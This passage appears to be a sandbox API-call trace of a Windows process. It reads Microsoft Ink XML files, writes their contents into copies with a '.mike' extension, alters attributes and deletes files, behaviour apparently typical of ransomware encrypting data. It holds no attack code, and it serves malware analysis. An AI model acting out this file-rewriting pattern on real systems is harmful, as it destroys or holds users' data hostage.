GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", lpFilePart=0x0) returned 0x5a [0046.034] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5a3b840, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5a3b840, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5a3b840, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2870)) returned 1 [0046.034] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.034] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", lpFilePart=0x0) returned 0x5a [0046.034] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22409e8 | out: lpFileInformation=0x22409e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5a3b840, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5a3b840, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5a3b840, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2870)) returned 1 [0046.034] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.034] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", dwFileAttributes=0x80) returned 0 [0046.035] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.035] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", lpFilePart=0x0) returned 0x5a [0046.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0046.035] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5a3b840, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5a3b840, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5a3b840, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2870)) returned 1 [0046.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0046.035] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpFilePart=0x0) returned 0x55 [0046.036] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike", lpFilePart=0x0) returned 0x5a [0046.036] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.mike")) returned 1 [0046.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.037] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0046.037] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0046.038] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0046.038] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.038] GetFileType (hFile=0x264) returned 0x1 [0046.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0046.039] GetFileType (hFile=0x264) returned 0x1 [0046.039] CloseHandle (hObject=0x264) returned 1 [0046.039] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.039] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.039] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0046.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0046.039] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0046.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.039] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), fInfoLevelId=0x0, lpFileInformation=0x2242c6c | out: lpFileInformation=0x2242c6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2b3b)) returned 1 [0046.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.039] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.039] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), fInfoLevelId=0x0, lpFileInformation=0x2242fac | out: lpFileInformation=0x2242fac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2b3b)) returned 1 [0046.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.040] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.040] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", lpFilePart=0x0) returned 0x56 [0046.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.040] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.040] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.040] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.040] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.040] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", lpFilePart=0x0) returned 0x56 [0046.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0046.040] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0046.040] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", lpFilePart=0x0) returned 0x56 [0046.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.040] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.041] GetFileType (hFile=0x264) returned 0x1 [0046.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.041] GetFileType (hFile=0x264) returned 0x1 [0046.041] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0046.041] WriteFile (in: hFile=0x264, lpBuffer=0x2243f30*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x2243f30*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0046.042] CloseHandle (hObject=0x264) returned 1 [0046.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0046.042] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), fInfoLevelId=0x0, lpFileInformation=0x22439f8 | out: lpFileInformation=0x22439f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2b3b)) returned 1 [0046.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0046.042] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0046.042] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.042] GetFileType (hFile=0x264) returned 0x1 [0046.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0046.042] GetFileType (hFile=0x264) returned 0x1 [0046.043] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0046.043] ReadFile (in: hFile=0x264, lpBuffer=0x224506c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x224506c*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0046.044] CloseHandle (hObject=0x264) returned 1 [0046.045] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", lpFilePart=0x0) returned 0x56 [0046.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.045] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.045] GetFileType (hFile=0x264) returned 0x1 [0046.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.045] GetFileType (hFile=0x264) returned 0x1 [0046.045] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0046.045] WriteFile (in: hFile=0x264, lpBuffer=0x224f5d4*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af04c, lpOverlapped=0x0 | out: lpBuffer=0x224f5d4*, lpNumberOfBytesWritten=0x2af04c*=0x2800, lpOverlapped=0x0) returned 1 [0046.045] CloseHandle (hObject=0x264) returned 1 [0046.046] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0046.046] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.046] GetFileType (hFile=0x264) returned 0x1 [0046.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0046.046] GetFileType (hFile=0x264) returned 0x1 [0046.046] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x2800 [0046.046] ReadFile (in: hFile=0x264, lpBuffer=0x2252058, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2252058*, lpNumberOfBytesRead=0x2af038*=0x33b, lpOverlapped=0x0) returned 1 [0046.046] CloseHandle (hObject=0x264) returned 1 [0046.047] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", lpFilePart=0x0) returned 0x56 [0046.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.047] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.047] GetFileType (hFile=0x264) returned 0x1 [0046.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.047] GetFileType (hFile=0x264) returned 0x1 [0046.047] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x2a20 [0046.047] WriteFile (in: hFile=0x264, lpBuffer=0x2256280*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x2256280*, lpNumberOfBytesWritten=0x2af02c*=0x340, lpOverlapped=0x0) returned 1 [0046.047] CloseHandle (hObject=0x264) returned 1 [0046.048] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", lpFilePart=0x0) returned 0x56 [0046.048] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0046.048] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.048] GetFileType (hFile=0x264) returned 0x1 [0046.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0046.048] GetFileType (hFile=0x264) returned 0x1 [0046.049] WriteFile (in: hFile=0x264, lpBuffer=0x22594c0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22594c0*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0046.049] CloseHandle (hObject=0x264) returned 1 [0046.050] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpFilePart=0x0) returned 0x51 [0046.050] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike", lpFilePart=0x0) returned 0x56 [0046.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.050] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5a619a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5a619a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5a619a0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2d60)) returned 1 [0046.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.050] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: 